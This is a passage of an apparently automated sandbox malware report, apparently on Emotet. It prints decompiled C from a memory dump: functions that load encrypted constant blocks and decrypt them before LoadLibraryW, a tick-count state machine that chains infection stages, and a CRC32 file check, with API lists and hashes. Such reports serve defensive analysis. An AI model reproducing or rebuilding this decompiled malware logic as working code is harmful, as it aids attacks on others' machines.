				 *((intOrPtr*)(_t306 - 0x174)) = 0x85576754;
				 *((intOrPtr*)(_t306 - 0x170)) = 0x1af32c8d;
				 *((intOrPtr*)(_t306 - 0x16c)) = 0xd1b14350;
				 *((intOrPtr*)(_t306 - 0x168)) = 0xd12fe87d;
				 *((intOrPtr*)(_t306 - 0x164)) = 0x54afa904;
				 *((intOrPtr*)(_t306 - 0x160)) = 0x555c17d1;
				 *((intOrPtr*)(_t306 - 0x15c)) = 0x5ab303a1;
				 *((intOrPtr*)(_t306 - 0x158)) = 0x4141ba66;
				 *((intOrPtr*)(_t306 - 0x154)) = 0x30858647;
				 *((intOrPtr*)(_t306 - 0x150)) = 0x9c14bad4;
				 *((intOrPtr*)(_t306 - 0x14c)) = 0xd86fd1f;
				 *((intOrPtr*)(_t306 - 0x148)) = 0x872c58c1;
				 *((intOrPtr*)(_t306 - 0x144)) = 0xd1736a58;
				 *((intOrPtr*)(_t306 - 0x140)) = 0xc23abb97;
				 *((intOrPtr*)(_t306 - 0x13c)) = 0x5c97e9ac;
				 *((intOrPtr*)(_t306 - 0x138)) = 0x40f5107;
				 *((intOrPtr*)(_t306 - 0x134)) = 0x1322ef6b;
				 *((intOrPtr*)(_t306 - 0x130)) = 0xa0dd9799;
				 *((intOrPtr*)(_t306 - 0x12c)) = 0x21b26a23;
				 *((intOrPtr*)(_t306 - 0x128)) = 0xaeb3b90c;
				 *((intOrPtr*)(_t306 - 0x124)) = 0x9a87d1f1;
				 *((intOrPtr*)(_t306 - 0x120)) = 0x58fb5bc5;
				 *((intOrPtr*)(_t306 - 0x11c)) = 0x776a360b;
				 *((intOrPtr*)(_t306 - 0x118)) = 0x8f1945cf;
				 *((intOrPtr*)(_t306 - 0x114)) = 0x5819ee19;
				 *((intOrPtr*)(_t306 - 0x110)) = 0x42b7bc5a;
				 *((intOrPtr*)(_t306 - 0x10c)) = 0xf8adc382;
				 *((intOrPtr*)(_t306 - 0x108)) = 0x11ac596c;
				 *((intOrPtr*)(_t306 - 0x104)) = 0xa1f49967;
				 *((intOrPtr*)(_t306 - 0x100)) = 0x8af28e00;
				 *((intOrPtr*)(_t306 - 0xfc)) = 0x5fc65770;
				 *((intOrPtr*)(_t306 - 0xf8)) = 0xe03e09c8;
				 *((intOrPtr*)(_t306 - 0xf4)) = 0xd6faa45c;
				 *((intOrPtr*)(_t306 - 0xf0)) = 0x38fce62d;
				 *((intOrPtr*)(_t306 - 0xec)) = 0x7887d211;
				 *((intOrPtr*)(_t306 - 0xe8)) = 0xebdf13b5;
				 *((intOrPtr*)(_t306 - 0xe4)) = 0xaa0aede6;
				 *((intOrPtr*)(_t306 - 0xe0)) = 0x90444ba9;
				 *((intOrPtr*)(_t306 - 0xdc)) = 0xcbea412e;
				 *((intOrPtr*)(_t306 - 0xd8)) = 0x6e29b6fd;
				 *((intOrPtr*)(_t306 - 0xd4)) = 0x48566881;
				 *((intOrPtr*)(_t306 - 0xd0)) = 0x285aaba2;
				 *((intOrPtr*)(_t306 - 0xcc)) = 0x2a435307;
				 *((intOrPtr*)(_t306 - 0xc8)) = 0x7aac094f;
				 *((intOrPtr*)(_t306 - 0xc4)) = 0xe0291f6f;
				_push(0x10f9141c);
				 *((intOrPtr*)(_t306 - 0xc0)) = 0xb51684fb;
				 *((intOrPtr*)(_t306 - 0xbc)) = 0x59b2e52f;
				 *((intOrPtr*)(_t306 - 0xb8)) = 0xaa729566;
				 *((intOrPtr*)(_t306 - 0xb4)) = 0xa26ca0ce;
				 *((intOrPtr*)(_t306 - 0xb0)) = 0x754332e6;
				 *((intOrPtr*)(_t306 - 0xac)) = 0x9678f1bc;
				 *((intOrPtr*)(_t306 - 0xa8)) = 0xabbe8667;
				 *((intOrPtr*)(_t306 - 0xa4)) = 0x236fad5d;
				 *((intOrPtr*)(_t306 - 0xa0)) = 0x8adc1fa5;
				 *((intOrPtr*)(_t306 - 0x9c)) = 0xbac16f0d;
				 *((intOrPtr*)(_t306 - 0x98)) = 0xdbb6bc05;
				 *((intOrPtr*)(_t306 - 0x94)) = 0x544b23d5;
				 *((intOrPtr*)(_t306 - 0x90)) = 0xb0f8a65a;
				 *((intOrPtr*)(_t306 - 0x8c)) = 0x919ab50e;
				 *((intOrPtr*)(_t306 - 0x88)) = 0xf6638cc1;
				 *((intOrPtr*)(_t306 - 0x84)) = 0xe51b69b4;
				 *((intOrPtr*)(_t306 - 0x80)) = 0xc0dcd897;
				 *((intOrPtr*)(_t306 - 0x7c)) = 0x35cdb74a;
				 *((intOrPtr*)(_t306 - 0x78)) = 0x56cc7454;
				 *((intOrPtr*)(_t306 - 0x74)) = 0xe340577d;
				 *((intOrPtr*)(_t306 - 0x70)) = 0x816122a3;
				 *((intOrPtr*)(_t306 - 0x6c)) = 0x3bb5cc08;
				 *((intOrPtr*)(_t306 - 0x68)) = 0x6c2d8743;
				 *((intOrPtr*)(_t306 - 0x64)) = 0x2cda8d95;
				 *((intOrPtr*)(_t306 - 0x60)) = 0x943036cf;
				 *((intOrPtr*)(_t306 - 0x5c)) = 0xe5c62dbc;
				 *((intOrPtr*)(_t306 - 0x58)) = 0xe75adba4;
				 *((intOrPtr*)(_t306 - 0x54)) = 0x79c37f9d;
				 *((intOrPtr*)(_t306 - 0x50)) = 0xadcde3;
				 *((intOrPtr*)(_t306 - 0x4c)) = 0x3a6ba4b;
				 *((intOrPtr*)(_t306 - 0x48)) = 0xc77d566d;
				 *((intOrPtr*)(_t306 - 0x44)) = 0xfc1b9373;
				 *((intOrPtr*)(_t306 - 0x40)) = 0x263f9fd8;
				 *((intOrPtr*)(_t306 - 0x3c)) = 0xdf940abd;
				 *((intOrPtr*)(_t306 - 0x38)) = 0x9c8870a8;
				 *((intOrPtr*)(_t306 - 0x34)) = 0x3ae0e433;
				 *((intOrPtr*)(_t306 - 0x30)) = 0x8f2bb891;
				 *((intOrPtr*)(_t306 - 0x2c)) = 0x98ace95a;
				 *((intOrPtr*)(_t306 - 0x28)) = 0xebb2b91f;
				 *((intOrPtr*)(_t306 - 0x24)) = 0x31990c30;
				 *((intOrPtr*)(_t306 - 0x20)) = 0x7364f0d4;
				 *((intOrPtr*)(_t306 - 0x1c)) = 0x7ca7b0f9;
				 *((intOrPtr*)(_t306 - 0x18)) = 0x9f8ecd6f;
				 *((intOrPtr*)(_t306 - 0x14)) = 0xd5e5570d;
				 *((intOrPtr*)(_t306 - 0x10)) = 0x1e5acd35;
				 *((intOrPtr*)(_t306 - 0xc)) = 0x32be44c6;
				 *((intOrPtr*)(_t306 - 8)) = 0xcc67ef4d;
				 *((intOrPtr*)(_t306 - 4)) = 0xac2adcf2;
				_t304 = L041D1D10(0x41e2860, 0x1bc, __edi, __esi);
				 *0x41e71ec = LoadLibraryW(_t292);
				L041D1DB0(_t304);
				return E041D1570(_t296,  *0x41e71ec, _t306 - 0x488, _t304, 0x122, 0x20bde51a, 0x41e5f10);
			}

0x041d9c2a
0x041d9c2a
0x041d9c34
0x041d9c3e
0x041d9c48
0x041d9c52
0x041d9c5c
0x041d9c66
0x041d9c70
0x041d9c7a
0x041d9c84
0x041d9c8e
0x041d9c98
0x041d9ca2
0x041d9cac
0x041d9cb6
0x041d9cc0
0x041d9cca
0x041d9cd4
0x041d9cde
0x041d9ce8
0x041d9cf2
0x041d9cfc
0x041d9d06
0x041d9d10
0x041d9d1a
0x041d9d24
0x041d9d2e
0x041d9d38
0x041d9d42
0x041d9d4c
0x041d9d56
0x041d9d60
0x041d9d6a
0x041d9d74
0x041d9d7e
0x041d9d88
0x041d9d92
0x041d9d9c
0x041d9da6
0x041d9db0
0x041d9dba
0x041d9dc4
0x041d9dce
0x041d9dd8
0x041d9de2
0x041d9dec
0x041d9df6
0x041d9e00
0x041d9e0a
0x041d9e14
0x041d9e1e
0x041d9e28
0x041d9e32
0x041d9e3c
0x041d9e46
0x041d9e50
0x041d9e5a
0x041d9e64
0x041d9e6e
0x041d9e78
0x041d9e82
0x041d9e8c
0x041d9e96
0x041d9ea0
0x041d9eaa
0x041d9eb4
0x041d9ebe
0x041d9ec8
0x041d9ed2
0x041d9edc
0x041d9ee6
0x041d9ef0
0x041d9efa
0x041d9f04
0x041d9f0e
0x041d9f18
0x041d9f22
0x041d9f2c
0x041d9f36
0x041d9f40
0x041d9f4a
0x041d9f54
0x041d9f5e
0x041d9f68
0x041d9f72
0x041d9f7c
0x041d9f86
0x041d9f90
0x041d9f9a
0x041d9fa4
0x041d9fae
0x041d9fb8
0x041d9fc2
0x041d9fcc
0x041d9fd6
0x041d9fe0
0x041d9fea
0x041d9ff4
0x041d9ffe
0x041da008
0x041da012
0x041da01c
0x041da026
0x041da030
0x041da03a
0x041da044
0x041da04e
0x041da058
0x041da062
0x041da06c
0x041da076
0x041da080
0x041da08a
0x041da094
0x041da09e
0x041da0a8
0x041da0b2
0x041da0bc
0x041da0c6
0x041da0d0
0x041da0da
0x041da0e4
0x041da0ee
0x041da0f8
0x041da102
0x041da10c
0x041da116
0x041da120
0x041da12a
0x041da134
0x041da13e
0x041da148
0x041da152
0x041da15c
0x041da166
0x041da170
0x041da17a
0x041da184
0x041da18e
0x041da198
0x041da1a2
0x041da1ac
0x041da1b6
0x041da1c0
0x041da1ca
0x041da1d4
0x041da1de
0x041da1e8
0x041da1f2
0x041da1fc
0x041da206
0x041da210
0x041da21a
0x041da224
0x041da22e
0x041da238
0x041da242
0x041da24c
0x041da256
0x041da260
0x041da26a
0x041da274
0x041da27e
0x041da288
0x041da292
0x041da29c
0x041da2a6
0x041da2b0
0x041da2ba
0x041da2c4
0x041da2ce
0x041da2d8
0x041da2e2
0x041da2ec
0x041da2f6
0x041da300
0x041da30a
0x041da314
0x041da31e
0x041da328
0x041da332
0x041da33c
0x041da346
0x041da350
0x041da35a
0x041da364
0x041da36e
0x041da378
0x041da382
0x041da38c
0x041da396
0x041da3a0
0x041da3aa
0x041da3b4
0x041da3be
0x041da3c8
0x041da3d2
0x041da3dc
0x041da3e6
0x041da3f0
0x041da3fa
0x041da404
0x041da40e
0x041da418
0x041da422
0x041da42c
0x041da436
0x041da440
0x041da44a
0x041da454
0x041da45e
0x041da468
0x041da472
0x041da47c
0x041da486
0x041da490
0x041da49a
0x041da4a4
0x041da4ae
0x041da4b8
0x041da4c2
0x041da4cc
0x041da4d6
0x041da4e0
0x041da4ea
0x041da4f4
0x041da4fe
0x041da508
0x041da512
0x041da51c
0x041da526
0x041da530
0x041da53a
0x041da544
0x041da54e
0x041da558
0x041da562
0x041da56c
0x041da576
0x041da580
0x041da58a
0x041da594
0x041da59e
0x041da5a8
0x041da5b7
0x041da5c1
0x041da5cb
0x041da5d5
0x041da5df
0x041da5e9
0x041da5f3
0x041da5fd
0x041da607
0x041da611
0x041da61b
0x041da625
0x041da62f
0x041da639
0x041da643
0x041da64d
0x041da654
0x041da65b
0x041da662
0x041da669
0x041da670
0x041da677
0x041da67e
0x041da685
0x041da68c
0x041da693
0x041da69a
0x041da6a1
0x041da6a8
0x041da6af
0x041da6b6
0x041da6bd
0x041da6c4
0x041da6cb
0x041da6d2
0x041da6d9
0x041da6e0
0x041da6e7
0x041da6ee
0x041da6f5
0x041da6fc
0x041da703
0x041da70a
0x041da711
0x041da718
0x041da71f
0x041da726
0x041da735
0x041da740
0x041da745
0x041da771

APIs

LoadLibraryW.KERNEL32(00000000), ref: 041DA738

Strings

"GT+, xrefs: 041D9D42
3:, xrefs: 041DA6D2
f,Ee, xrefs: 041D9CA2
bYT@, xrefs: 041D9CAC
8q#V, xrefs: 041D9ED2
*8c=, xrefs: 041DA27E
B, xrefs: 041DA35A
;T{, xrefs: 041DA38C
2Cu, xrefs: 041DA5D5
}W@, xrefs: 041DA662

Memory Dump Source

Source File: 00000000.00000002.655519273.00000000041D1000.00000020.00000001.sdmp, Offset: 041D0000, based on PE: true

Associated: 00000000.00000002.655514422.00000000041D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.655533816.00000000041E1000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.655540744.00000000041E2000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41d0000_emo.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: ;T{$"GT+$*8c=$3:$8q#V$B$bYT@$f,Ee$}W@$2Cu
API String ID: 1029625771-1369712648
Opcode ID: c2153c1b03f9a20c26fd043e392636d801d14ac957278dede5cdcdd2d4becb5a
Instruction ID: 734afeb65df3803ce46a2d580e5b16f954c7f7be9200becca49e65fdb27475db
Opcode Fuzzy Hash: c2153c1b03f9a20c26fd043e392636d801d14ac957278dede5cdcdd2d4becb5a
Instruction Fuzzy Hash: 8D32A6F4C163698BEB61DF429A887CCBB74FB01704F6096C8D1683A215CB755B86CF89

Uniqueness

Uniqueness Score: -1.00%

Function 041DCE91, Relevance: 10.6, APIs: 7, Instructions: 93
COMMON

Download Yara Rule

C-Code - Quality: 96%

			E041DCE91(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __fp0) {
				signed int _t15;
				void* _t24;

				_t24 = __ecx;
				_t14 = __eax;
				 *((intOrPtr*)(__esi + 0xf)) =  *((intOrPtr*)(__esi + 0xf)) + __edx;
				 *_t14 =  *__eax + __eax;
				_t15 = GetTickCount();
				if( *0x41e71f8 > _t15) {
					L19:
					return _t15;
				} else {
					_t15 =  *0x41e71fc - 1;
					if(_t15 > 3) {
						goto L19;
					} else {
						switch( *((intOrPtr*)(_t15 * 4 +  &M041DCFFC))) {
							case 0:
								 *0x41e71fc = 0;
								_t17 = L041D6E30(__edi, __esi, _t38);
								_t39 = _t17;
								if(_t17 == 0) {
									goto L7;
								} else {
									_t17 = L041D72D0(__edi, __esi, _t39);
									_t40 = _t17;
									if(_t17 == 0) {
										goto L7;
									} else {
										_t17 = E041DFAE0(__ebx, _t24, _t26, _t29, _t30, _t40);
										if(_t17 != 0) {
											goto L7;
										} else {
											_t18 = GetTickCount();
											_t20 = GetTickCount();
											 *0x41e71fc = 2;
											_t22 = _t20 + 0xbb8 + _t18 % 0xbb8;
											 *0x41e71f8 = _t22;
											return _t22;
										}
									}
								}
								goto L20;
							case 1:
								 *0x41e71fc = 0;
								__eflags = L041D7C60(__edi, __esi, __eflags);
								if(__eflags == 0) {
									L7:
									 *0x41e71fc = 4;
									return _t17;
								} else {
									__eflags = L041D8140(__edi, __esi, __eflags);
									if(__eflags == 0) {
										goto L7;
									} else {
										__eflags = L041D9290(__edi, __esi, __eflags);
										if(__eflags == 0) {
											goto L7;
										} else {
											__eflags = L041D9C20(__edi, __esi, __eflags);
											if(__eflags == 0) {
												goto L7;
											} else {
												__eax = L041DA780(__edi, __esi, __eflags);
												__eflags = __eax;
												if(__eax == 0) {
													goto L7;
												} else {
													L041DB930();
													__eflags = __eax;
													if(__eax == 0) {
														goto L7;
													} else {
														__esp = __esp - 8;
														__eax = E041D6B80(__ecx);
														__esp = __esp + 8;
														__eflags = __eax;
														if(__eax == 0) {
															goto L7;
														} else {
															_push(__ecx);
															__ecx = __eax;
															__eax = E041DFF10(__eax);
															__esp = __esp + 4;
															__eflags = __eax;
															if(__eax == 0) {
																goto L7;
															} else {
																__eax = GetTickCount();
																__edx = 0;
																__ecx = 0xbb8;
																_t13 = __eax % 0xbb8;
																__eax = __eax / 0xbb8;
																__edx = _t13;
																__esi = _t13;
																__eax = GetTickCount();
																__eax = __eax + 0xbb8;
																 *0x41e71fc = 3;
																__eax = __eax + _t13;
																__eflags = __eax;
																 *0x41e71f8 = __eax;
																_pop(__esi);
																return __eax;
															}
														}
													}
												}
											}
										}
									}
								}
								goto L20;
							case 2:
								 *0x41e71fc = 0;
								__esi = GetTickCount();
								__eax = E041DCD40(__ebx, __eflags, __fp0);
								__esi = __esi + __eax;
								__eflags = __esi;
								 *0x41e71fc = 3;
								 *0x41e71f8 = __esi;
								_pop(__esi);
								return __eax;
								goto L20;
							case 3:
								__eax = SetEvent( *0x41e421c);
								goto L19;
						}
					}
				}
				L20:
			}

0x041dce91
0x041dce91
0x041dce96
0x041dce9c
0x041dce9e
0x041dceaa
0x041dcff7
0x041dcff8
0x041dceb0
0x041dceb5
0x041dceb9
0x00000000
0x041dcebf
0x041dcebf
0x00000000
0x041dcec6
0x041dced0
0x041dced5
0x041dced7
0x00000000
0x041dced9
0x041dced9
0x041dcede
0x041dcee0
0x00000000
0x041dcee2
0x041dcee2
0x041dcee9
0x00000000
0x041dceeb
0x041dceeb
0x041dcefc
0x041dcf07
0x041dcf11
0x041dcf13
0x041dcf19
0x041dcf19
0x041dcee9
0x041dcee0
0x00000000
0x00000000
0x041dcf2a
0x041dcf39
0x041dcf3b
0x041dcf1c
0x041dcf1c
0x041dcf27
0x041dcf3d
0x041dcf42
0x041dcf44
0x00000000
0x041dcf46
0x041dcf4b
0x041dcf4d
0x00000000
0x041dcf4f
0x041dcf54
0x041dcf56
0x00000000
0x041dcf58
0x041dcf58
0x041dcf5d
0x041dcf5f
0x00000000
0x041dcf61
0x041dcf61
0x041dcf66
0x041dcf68
0x00000000
0x041dcf6a
0x041dcf6a
0x041dcf6d
0x041dcf72
0x041dcf75
0x041dcf77
0x00000000
0x041dcf79
0x041dcf79
0x041dcf7f
0x041dcf81
0x041dcf86
0x041dcf89
0x041dcf8b
0x00000000
0x041dcf8d
0x041dcf8d
0x041dcf93
0x041dcf95
0x041dcf9a
0x041dcf9a
0x041dcf9a
0x041dcf9c
0x041dcf9e
0x041dcfa4
0x041dcfa9
0x041dcfb3
0x041dcfb3
0x041dcfb5
0x041dcfba
0x041dcfbb
0x041dcfbb
0x041dcf8b
0x041dcf77
0x041dcf68
0x041dcf5f
0x041dcf56
0x041dcf4d
0x041dcf44
0x00000000
0x00000000
0x041dcfbe
0x041dcfce
0x041dcfd0
0x041dcfd5
0x041dcfd5
0x041dcfd7
0x041dcfe1
0x041dcfe7
0x041dcfe8
0x00000000
0x00000000
0x041dcff1
0x00000000
0x00000000
0x041dcebf
0x041dceb9
0x00000000

APIs

GetTickCount.KERNEL32 ref: 041DCE9E
GetTickCount.KERNEL32 ref: 041DCEEB
GetTickCount.KERNEL32 ref: 041DCEFC
GetTickCount.KERNEL32 ref: 041DCF8D
GetTickCount.KERNEL32 ref: 041DCF9E
GetTickCount.KERNEL32 ref: 041DCFC8
SetEvent.KERNEL32 ref: 041DCFF1

Memory Dump Source

Source File: 00000000.00000002.655519273.00000000041D1000.00000020.00000001.sdmp, Offset: 041D0000, based on PE: true

Associated: 00000000.00000002.655514422.00000000041D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.655533816.00000000041E1000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.655540744.00000000041E2000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41d0000_emo.jbxd

Yara matches

Similarity

API ID: CountTick$Event
String ID:
API String ID: 3385148376-0
Opcode ID: 61db26832bb602179bbf072e7856ec4c813bb8404e4e8cf30701becfb3f323e1
Instruction ID: 6127bd2cf515a5bb7cd78aaf80a60e15b5ff5c3f574b639ae5e26eb4e3c4e4f3
Opcode Fuzzy Hash: 61db26832bb602179bbf072e7856ec4c813bb8404e4e8cf30701becfb3f323e1
Instruction Fuzzy Hash: CA31C1F950430247FB18ABB7B8847953695DF5634DF0949A5C922DA2C1FB79E8C0CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 041DF574, Relevance: 9.0, APIs: 6, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E041DF574() {
				int _t3;
				void* _t7;
				void* _t9;
				void* _t11;

				_t7 = MapViewOfFile();
				if(_t7 != 0) {
					 *0x41e441c = RtlComputeCrc32(0, _t7, GetFileSize(_t11, 0));
					UnmapViewOfFile(_t7);
				}
				CloseHandle(_t9);
				_t3 = CloseHandle(_t11);
				return _t3;
			}

0x041df57a
0x041df57e
0x041df594
0x041df599
0x041df599
0x041df5a0
0x041df5a8
0x041df5b0

APIs

MapViewOfFile.KERNEL32 ref: 041DF574
GetFileSize.KERNEL32(?,00000000), ref: 041DF583
RtlComputeCrc32.NTDLL(00000000,00000000,00000000), ref: 041DF58D
UnmapViewOfFile.KERNEL32(00000000,?,00000000), ref: 041DF599
CloseHandle.KERNEL32 ref: 041DF5A0
CloseHandle.KERNEL32 ref: 041DF5A8

Memory Dump Source

Source File: 00000000.00000002.655519273.00000000041D1000.00000020.00000001.sdmp, Offset: 041D0000, based on PE: true

Associated: 00000000.00000002.655514422.00000000041D0000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.655533816.00000000041E1000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.655540744.00000000041E2000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_41d0000_emo.jbxd

Yara matches

Similarity

API ID: File$CloseHandleView$ComputeCrc32SizeUnmap
String ID:
API String ID: 741204879-0
Opcode ID: 056ee1dc90d506c95a658179cc2d68f36e51f221f0f7e13c5201f85a25c9b2c1
Instruction ID: 7e42d8193bc26c061c58a01f7ac75066e84c7442db74afe11c5807700bf11aa1
Opcode Fuzzy Hash: 056ee1dc90d506c95a658179cc2d68f36e51f221f0f7e13c5201f85a25c9b2c1
Instruction Fuzzy Hash: 48E0E67D640651AFD7051BE7B98CF6D36A8EB4DB07F040055F206C9140CB6C4DC24B69

Uniqueness

Uniqueness Score: -1.00%

Function 041D6E3A, Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 140
libraryCOMMON

Download Yara Rule

C-Code - Quality: 98%

			E041D6E3A(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				void* _t124;
				void* _t134;

				_t124 = __ebx;
				 *((intOrPtr*)(_t134 - 0x1d8)) = 0x82472293;
				 *((intOrPtr*)(_t134 - 0x1d4)) = 0x7bd2594d;
				 *((intOrPtr*)(_t134 - 0x1d0)) = 0x3c42ea19;
				 *((intOrPtr*)(_t134 - 0x1cc)) = 0xe7c61627;
				 *((intOrPtr*)(_t134 - 0x1c8)) = 0xf99e7102;
				 *((intOrPtr*)(_t134 - 0x1c4)) = 0xe044e4ec;
				 *((intOrPtr*)(_t134 - 0x1c0)) = 0x38ecfbe5;
				 *((intOrPtr*)(_t134 - 0x1bc)) = 0xc8d3b4c6;
				 *((intOrPtr*)(_t134 - 0x1b8)) = 0xcbc9164b;
				 *((intOrPtr*)(_t134 - 0x1b4)) = 0xb8586de7;
				 *((intOrPtr*)(_t134 - 0x1b0)) = 0xab94b50f;
				 *((intOrPtr*)(_t134 - 0x1ac)) = 0xcd7eeba8;
				 *((intOrPtr*)(_t134 - 0x1a8)) = 0x8f8c8696;
				 *((intOrPtr*)(_t134 - 0x1a4)) = 0xf4310161;
				 *((intOrPtr*)(_t134 - 0x1a0)) = 0xbdfb7a1c;
				 *((intOrPtr*)(_t134 - 0x19c)) = 0x689fcb1d;
				 *((intOrPtr*)(_t134 - 0x198)) = 0xeba259e;
				 *((intOrPtr*)(_t134 - 0x194)) = 0x38ee263f;
				 *((intOrPtr*)(_t134 - 0x190)) = 0x256c946a;
				 *((intOrPtr*)(_t134 - 0x18c)) = 0xffeff022;
				 *((intOrPtr*)(_t134 - 0x188)) = 0x9e808a8b;
				 *((intOrPtr*)(_t134 - 0x184)) = 0x5d53a508;
				 *((intOrPtr*)(_t134 - 0x180)) = 0xad6c0f5e;
				 *((intOrPtr*)(_t134 - 0x17c)) = 0x414247c0;
				 *((intOrPtr*)(_t134 - 0x178)) = 0x9008ab13;
				 *((intOrPtr*)(_t134 - 0x174)) = 0xe58dfa82;
				 *((intOrPtr*)(_t134 - 0x170)) = 0x7c74d2d9;
				 *((intOrPtr*)(_t134 - 0x16c)) = 0x5b2abf08;
				 *((intOrPtr*)(_t134 - 0x168)) = 0xa90e9b61;
				 *((intOrPtr*)(_t134 - 0x164)) = 0x5bd4abca;
				 *((intOrPtr*)(_t134 - 0x160)) = 0x39c4aaea;
				 *((intOrPtr*)(_t134 - 0x15c)) = 0xef5958f8;
				 *((intOrPtr*)(_t134 - 0x158)) = 0xa340f289;
				 *((intOrPtr*)(_t134 - 0x154)) = 0x8491f536;
				 *((intOrPtr*)(_t134 - 0x150)) = 0xd0075d38;
				 *((intOrPtr*)(_t134 - 0x14c)) = 0xbb78a1bb;
				 *((intOrPtr*)(_t134 - 0x148)) = 0xab8a0c45;
				 *((intOrPtr*)(_t134 - 0x144)) = 0x6ef79686;
				 *((intOrPtr*)(_t134 - 0x140)) = 0x19edad06;
				 *((intOrPtr*)(_t134 - 0x13c)) = 0xacef0ee1;
				 *((intOrPtr*)(_t134 - 0x138)) = 0x3c058933;
				 *((intOrPtr*)(_t134 - 0x134)) = 0x18f1a4e2;
				 *((intOrPtr*)(_t134 - 0x130)) = 0xaa13281f;
				 *((intOrPtr*)(_t134 - 0x12c)) = 0x583b2eb0;
				 *((intOrPtr*)(_t134 - 0x128)) = 0xec8f2b60;
				 *((intOrPtr*)(_t134 - 0x124)) = 0xec8d9903;
				 *((intOrPtr*)(_t134 - 0x120)) = 0xd7db8dc;
				 *((intOrPtr*)(_t134 - 0x11c)) = 0xde0081ab;
				 *((intOrPtr*)(_t134 - 0x118)) = 0xd3285a3d;
				 *((intOrPtr*)(_t134 - 0x114)) = 0x76547dd1;
				 *((intOrPtr*)(_t134 - 0x110)) = 0xc9973301;
				 *((intOrPtr*)(_t134 - 0x10c)) = 0xf3e799b2;
				 *((intOrPtr*)(_t134 - 0x108)) = 0xa0930d6d;
				 *((intOrPtr*)(_t134 - 0x104)) = 0x8ba414d3;
				 *((intOrPtr*)(_t134 - 0x100)) = 0xd6c986dc;
				 *((intOrPtr*)(_t134 - 0xfc)) = 0x2dbaa1c7;
				 *((intOrPtr*)(_t134 - 0xf8)) = 0x4d5196f1;
				 *((intOrPtr*)(_t134 - 0xf4)) = 0x532e1a94;
				 *((intOrPtr*)(_t134 - 0xf0)) = 0xc29f0e71;
				 *((intOrPtr*)(_t134 - 0xec)) = 0x82d9cbd7;
				 *((intOrPtr*)(_t134 - 0xe8)) = 0x8d2e702f;
				 *((intOrPtr*)(_t134 - 0xe4)) = 0x3cd1c507;
				 *((intOrPtr*)(_t134 - 0xe0)) = 0xf7297813;
				 *((intOrPtr*)(_t134 - 0xdc)) = 0x9f0cbb3c;
				 *((intOrPtr*)(_t134 - 0xd8)) = 0x134fd2a2;
				 *((intOrPtr*)(_t134 - 0xd4)) = 0x57f52550;
				 *((intOrPtr*)(_t134 - 0xd0)) = 0x43f75c28;
				 *((intOrPtr*)(_t134 - 0xcc)) = 0xc089cb77;
				 *((intOrPtr*)(_t134 - 0xc8)) = 0xa6937a45;
				 *((intOrPtr*)(_t134 - 0xc4)) = 0x126a0187;
				 *((intOrPtr*)(_t134 - 0xc0)) = 0xc08e4772;
				 *((intOrPtr*)(_t134 - 0xbc)) = 0xb217e0af;
				 *((intOrPtr*)(_t134 - 0xb8)) = 0x5b1c3383;
				 *((intOrPtr*)(_t134 - 0xb4)) = 0xe12b96ee;
				 *((intOrPtr*)(_t134 - 0xb0)) = 0x9a5eaa8f;
				 *((intOrPtr*)(_t134 - 0xac)) = 0xda1cc80;
				 *((intOrPtr*)(_t134 - 0xa8)) = 0x2d1c74f2;
				 *((intOrPtr*)(_t134 - 0xa4)) = 0xc41fd3d1;
				 *((intOrPtr*)(_t134 - 0xa0)) = 0x1c906283;
				 *((intOrPtr*)(_t134 - 0x9c)) = 0xe89d7a5b;
				_push(0x10f9141c);
				 *((intOrPtr*)(_t134 - 0x98)) = 0xfa215643;
				 *((intOrPtr*)(_t134 - 0x94)) = 0xf6acfd24;
				 *((intOrPtr*)(_t134 - 0x90)) = 0xac7b5ae9;
				 *((intOrPtr*)(_t134 - 0x8c)) = 0x27b06b67;
				 *((intOrPtr*)(_t134 - 0x88)) = 0x70ca03fb;
				 *((intOrPtr*)(_t134 - 0x84)) = 0x526e9be0;
				 *((intOrPtr*)(_t134 - 0x80)) = 0xb7d2bed9;
				 *((intOrPtr*)(_t134 - 0x7c)) = 0xe8859b5e;
				 *((intOrPtr*)(_t134 - 0x78)) = 0xc759a22d;
				 *((intOrPtr*)(_t134 - 0x74)) = 0x3d0f084e;
				 *((intOrPtr*)(_t134 - 0x70)) = 0x3899d01a;
				 *((intOrPtr*)(_t134 - 0x6c)) = 0x1bac7a28;
				 *((intOrPtr*)(_t134 - 0x68)) = 0x5de6e4cd;
				 *((intOrPtr*)(_t134 - 0x64)) = 0x9e6bbd4;
				 *((intOrPtr*)(_t134 - 0x60)) = 0x7ce5cce6;
				 *((intOrPtr*)(_t134 - 0x5c)) = 0x480d6679;
				 *((intOrPtr*)(_t134 - 0x58)) = 0x2b5c73dd;
				 *((intOrPtr*)(_t134 - 0x54)) = 0x84318722;
				 *((intOrPtr*)(_t134 - 0x50)) = 0xb8503dd2;
				 *((intOrPtr*)(_t134 - 0x4c)) = 0x221dcfb0;
				 *((intOrPtr*)(_t134 - 0x48)) = 0xdc8b90d0;
				 *((intOrPtr*)(_t134 - 0x44)) = 0xc485ac00;
				 *((intOrPtr*)(_t134 - 0x40)) = 0x973c44ba;
				 *((intOrPtr*)(_t134 - 0x3c)) = 0x5e64f4f2;
				 *((intOrPtr*)(_t134 - 0x38)) = 0x4c2f3f10;
				 *((intOrPtr*)(_t134 - 0x34)) = 0xc23384f2;
				 *((intOrPtr*)(_t134 - 0x30)) = 0x31cd6972;
				 *((intOrPtr*)(_t134 - 0x2c)) = 0x8d571f10;
				 *((intOrPtr*)(_t134 - 0x28)) = 0xc26f54e0;
				 *((intOrPtr*)(_t134 - 0x24)) = 0x99b23930;
				 *((intOrPtr*)(_t134 - 0x20)) = 0x66df1800;
